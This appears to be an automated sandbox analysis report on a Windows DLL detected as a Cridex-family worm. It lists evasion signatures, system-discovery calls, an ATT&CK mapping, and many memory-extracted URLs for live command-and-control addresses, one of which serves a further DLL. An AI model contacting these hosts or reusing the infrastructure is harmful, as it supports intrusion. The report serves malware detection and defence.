                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F00CEF8 FindFirstFileExW,
                      Source: loaddll32.exe, 00000000.00000002.872703373.00000000015AB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWw
                      Source: rundll32.exe, 00000003.00000003.490201324.000000000072C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW8
                      Source: loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.490201324.000000000072C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW

                      Anti Debugging:

                      barindex
                      Found potential dummy code loops (likely to delay analysis)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 90% for more than 60s
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF6C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF7A60 RtlAddVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.873263052.0000000001CD0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.885731516.0000000003360000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.873263052.0000000001CD0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.885731516.0000000003360000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.873263052.0000000001CD0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.885731516.0000000003360000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: loaddll32.exe, 00000000.00000002.873263052.0000000001CD0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.885731516.0000000003360000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF2980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection112Virtualization/Sandbox Evasion11Input Capture1Security Software Discovery11Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection112LSASS MemoryVirtualization/Sandbox Evasion11Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rundll321NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Variant.Razy.980776.8232.dll6%VirustotalBrowse
                      SecuriteInfo.com.Variant.Razy.980776.8232.dll18%ReversingLabsWin32.Worm.Cridex

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://143.244.140.214:808/90%Avira URL Cloudsafe
                      https://143.244.140.214/N0%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dll0%Avira URL Cloudsafe
                      https://143.244.140.214:808/lq0%Avira URL Cloudsafe
                      https://143.244.140.214:808/40%Avira URL Cloudsafe
                      https://455.56.219.47:8116/0%Avira URL Cloudsafe
                      https://143.244.140.214:808/hyz0%Avira URL Cloudsafe
                      https://192.46.210.220/Certification0%URL Reputationsafe
                      https://192.46.210.220/7.0.96:6891/Microsoft0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/.0.96:6891/0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/$0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/oft0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/n0%Avira URL Cloudsafe
                      https://143.244.140.214/%0%Avira URL Cloudsafe
                      https://143.244.140.214:808/hyg0%Avira URL Cloudsafe
                      https://143.244.140.214:808/oft0%URL Reputationsafe
                      https://45.77.0.96:6891/u0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/g0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/.0.96:6891/Microsoft0%Avira URL Cloudsafe
                      https://143.244.140.214:808/T0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/fW0%Avira URL Cloudsafe
                      https://143.244.140.214:808/ll0%Avira URL Cloudsafe
                      https://143.244.140.214/60%Avira URL Cloudsafe
                      https://192.46.210.220/)0%Avira URL Cloudsafe
                      https://192.46.210.220/7.0.96:6891/0%Avira URL Cloudsafe
                      https://143.244.140.214:808/lg0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/ES0%Avira URL Cloudsafe
                      https://192.46.210.220/&0%Avira URL Cloudsafe
                      https://192.46.210.220/GlobalSign0%URL Reputationsafe
                      https://143.244.140.214:808/la0%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dlluKZ0%Avira URL Cloudsafe
                      https://192.46.210.220/-0%Avira URL Cloudsafe
                      https://192.46.210.220/;0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/Q0%Avira URL Cloudsafe
                      https://143.244.140.214/0%URL Reputationsafe
                      https://143.244.140.214:808/My0%URL Reputationsafe
                      https://185.56.219.47/0%URL Reputationsafe
                      https://192.46.210.220/50%Avira URL Cloudsafe
                      https://185.56.219.47:8116/V0%Avira URL Cloudsafe
                      https://192.46.210.220/C0%Avira URL Cloudsafe
                      https://192.46.210.220/0y0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/4.140.214:808/0%Avira URL Cloudsafe
                      https://192.46.210.220/G0%Avira URL Cloudsafe
                      https://185.56.219.47/R0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/08/0%Avira URL Cloudsafe
                      https://143.244.140.214:808/em320%Avira URL Cloudsafe
                      https://192.46.210.220/S0%Avira URL Cloudsafe
                      https://192.46.210.220/Q0%Avira URL Cloudsafe
                      https://192.46.210.220/O0%Avira URL Cloudsafe
                      https://143.244.140.214:808/0%URL Reputationsafe
                      https://185.56.219.47:8116/.0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/0%URL Reputationsafe
                      https://192.46.210.220/Y0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/-0%Avira URL Cloudsafe
                      https://185.56.219.47/c0%Avira URL Cloudsafe
                      https://192.46.210.220/W0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/30%Avira URL Cloudsafe
                      https://185.56.219.47:8116/00%Avira URL Cloudsafe
                      https://192.46.210.220/V0%Avira URL Cloudsafe
                      https://192.46.210.220/en-US0%Avira URL Cloudsafe
                      https://192.46.210.220/d0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/50%Avira URL Cloudsafe
                      https://45.77.0.96:6891/-0%Avira URL Cloudsafe
                      https://143.244.140.214:808/ll&0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/?0%Avira URL Cloudsafe
                      https://192.46.210.220/j0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/C0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/D0%Avira URL Cloudsafe
                      https://192.46.210.220/r0%Avira URL Cloudsafe
                      https://192.46.210.220/n0%Avira URL Cloudsafe
                      https://143.244.140.214:808/hy0%URL Reputationsafe
                      https://185.56.219.47:8116/llt0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/0%URL Reputationsafe
                      https://45.77.0.96/0%URL Reputationsafe
                      https://185.56.219.47:8116/l0%Avira URL Cloudsafe
                      https://192.46.210.220/graphy0%Avira URL Cloudsafe
                      https://192.46.210.220/coro80%Avira URL Cloudsafe
                      https://45.77.0.96:6891/6/0%Avira URL Cloudsafe
                      https://143.244.140.214:808/llg0%Avira URL Cloudsafe
                      https://143.244.140.214:808/llh0%Avira URL Cloudsafe
                      https://192.46.210.220/56.219.47:8116/0%Avira URL Cloudsafe
                      https://192.46.210.220/0%URL Reputationsafe
                      https://182.46.210.220/0%Avira URL Cloudsafe
                      https://142.46.210.220/0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/soft0%Avira URL Cloudsafe
                      https://45.77.0.96/A0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/der0%Avira URL Cloudsafe
                      https://143.244.140.214:808/x0%Avira URL Cloudsafe
                      https://143.244.140.214:808/.140.214:808/0%Avira URL Cloudsafe
                      https://143.244.140.214:808/l90%Avira URL Cloudsafe
                      https://143.244.140.214:808/z0%Avira URL Cloudsafe
                      https://183.244.140.214:808/0%Avira URL Cloudsafe
                      https://143.244.140.214:808/q0%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dllu0%Avira URL Cloudsafe
                      https://143.244.140.214:808/l00%Avira URL Cloudsafe
                      https://143.244.140.214:808/l/0%Avira URL Cloudsafe
                      https://143.244.140.214:808/h0%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dllusZ0%Avira URL Cloudsafe
                      https://143.244.140.214:808/l0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://192.46.210.220/true
                      • URL Reputation: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://143.244.140.214:808/9rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214/Nloaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/aenh.dllloaddll32.exe, 00000000.00000003.796127425.00000000015B9000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.677056521.00000000015B8000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.806745321.000000000073D000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/lqrundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/4rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://455.56.219.47:8116/loaddll32.exe, 00000000.00000003.853804872.00000000015B8000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://143.244.140.214:808/hyzrundll32.exe, 00000003.00000003.711929481.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Certificationloaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://192.46.210.220/7.0.96:6891/Microsoftrundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.711929481.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/.0.96:6891/rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/$loaddll32.exe, 00000000.00000003.496791595.00000000015BF000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/oftrundll32.exe, 00000003.00000003.675255963.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/nloaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214/%rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/hygrundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/oftloaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://45.77.0.96:6891/urundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/grundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/.0.96:6891/Microsoftrundll32.exe, 00000003.00000003.823680145.000000000073D000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/Tloaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/fWloaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/llrundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214/6loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/)loaddll32.exe, 00000000.00000003.771239473.00000000015B9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/7.0.96:6891/rundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/lgrundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/ESloaddll32.exe, 00000000.00000003.845510085.00000000015B9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/&rundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/GlobalSignloaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://143.244.140.214:808/laloaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/aenh.dlluKZrundll32.exe, 00000003.00000003.798077134.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/-rundll32.exe, 00000003.00000003.616107262.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/;loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/Qrundll32.exe, 00000003.00000003.711929481.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214/rundll32.exefalse
                      • URL Reputation: safe
                      		unknown
                      https://143.244.140.214:808/Myrundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://185.56.219.47/loaddll32.exe, 00000000.00000003.499876344.00000000015BF000.00000004.00000001.sdmp, rundll32.exefalse
                      • URL Reputation: safe
                      		unknown
                      https://192.46.210.220/5loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/Vloaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Cloaddll32.exe, 00000000.00000003.771239473.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.554460856.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/0yrundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/4.140.214:808/loaddll32.exe, 00000000.00000003.577869805.00000000015B8000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Grundll32.exe, 00000003.00000002.874095121.00000000006C0000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47/Rloaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/08/rundll32.exe, 00000003.00000003.487957725.000000000073F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/em32rundll32.exe, 00000003.00000003.798077134.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.742742966.000000000073E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Srundll32.exe, 00000003.00000002.874111999.00000000006CA000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Qrundll32.exe, 00000003.00000003.493682410.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Oloaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exefalse
                      • URL Reputation: safe
                      		unknown
                      https://185.56.219.47:8116/.loaddll32.exe, 00000000.00000003.577869805.00000000015B8000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.519473645.0000000000739000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://192.46.210.220/Yloaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/-rundll32.exe, 00000003.00000003.554460856.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47/crundll32.exe, 00000003.00000003.493682410.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Wloaddll32.exe, 00000000.00000003.845510085.00000000015B9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/3rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/0loaddll32.exe, 00000000.00000003.535107117.00000000015B7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.490150806.0000000000713000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Vrundll32.exe, 00000003.00000003.798077134.0000000000739000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/en-USloaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.874111999.00000000006CA000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/crundll32.exe, 00000003.00000003.527805201.0000000000739000.00000004.00000001.sdmpfalse
                        		unknown
                        https://192.46.210.220/dloaddll32.exe, 00000000.00000003.796127425.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/5rundll32.exe, 00000003.00000003.489963534.000000000073E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/-rundll32.exe, 00000003.00000003.527805201.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/ll&rundll32.exe, 00000003.00000003.562908687.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/?loaddll32.exe, 00000000.00000003.677056521.00000000015B8000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/jrundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/Crundll32.exe, 00000003.00000003.657662148.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/Dloaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.657662148.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/rrundll32.exe, 00000003.00000003.742742966.000000000073E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/nloaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/hyloaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://185.56.219.47:8116/lltloaddll32.exe, 00000000.00000003.496791595.00000000015BF000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.496791595.00000000015BF000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.744898408.00000000015C0000.00000004.00000001.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://45.77.0.96/loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://185.56.219.47:8116/lloaddll32.exe, 00000000.00000003.704163950.00000000015B9000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/graphyrundll32.exe, 00000003.00000003.742742966.000000000073E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.711929481.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/coro8loaddll32.exe, 00000000.00000003.618838198.00000000015B8000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/6/loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/llgrundll32.exe, 00000003.00000003.562908687.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/llhrundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/56.219.47:8116/rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://182.46.210.220/loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.823680145.000000000073D000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://142.46.210.220/rundll32.exe, 00000003.00000002.874111999.00000000006CA000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/softloaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.789649850.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.857089400.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
